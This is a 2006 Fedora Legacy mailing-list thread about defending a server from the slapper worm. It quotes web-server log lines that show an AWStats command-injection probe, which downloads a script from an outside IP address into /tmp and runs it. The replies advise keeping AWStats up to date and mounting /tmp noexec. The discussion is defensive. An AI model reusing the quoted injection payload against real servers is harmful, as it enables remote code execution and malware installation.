slapper worm
William Stockall
wstockal at compusmart.ab.ca
Tue Jan 24 00:16:07 UTC 2006
I don't remember for sure if this will work, but it may be possible to
do something like this:
mount --bind /tmp /tmp -o noexec
I think that will now enforce the noexec on /tmp without having to
create a new partition for tmp.
Will.
Michael Mansour wrote:
> Hi Kelson,
>
>
>>Michael Mansour wrote:
>>
>>>220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET
>>>/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
>>>
>
> mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
>
>>> HTTP/1.1"
>>> 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
>>>220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET
>>>/cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
>>>
>
> mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
>
>>> HTTP/1.1"
>>> 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
>>
>>...
>>
>>>Are there any updates FL can do to any of the packages to fix/block
>>>slapper from an FC1 machine?
>>
>>You might also want to make sure you're using a current version of
>>AWStats. IIRC this flaw was fixed in either 6.3 or 6.4, and the current
>>version is 6.5.
>
>
> Yeah, I run awstats 6.5 on that system.
>
>
>>(If you don't have awstats.pl on your system, then these lines are
>>just probes and aren't relevant to your problem.)
>>
>>More generally, I read advice somewhere that mounting /tmp with the
>>"noexec" option (and making any other temp directories symbolic
>>links to that one) can make this type of attack much more difficult.
>
>
> Definately noted as one of the measures to stop this type of attack, but for
> this particular server, /tmp is not a mounted filesystem but part of /, so I
> can't really do that without re-partitioning the disk and creating a dedicated
> /tmp.
>
> Thanks.
>
> Michael.
>
> --
> fedora-legacy-list mailing list
> fedora-legacy-list at redhat.com
> https://www.redhat.com/mailman/listinfo/fedora-legacy-list
More information about the fedora-legacy-list
mailing list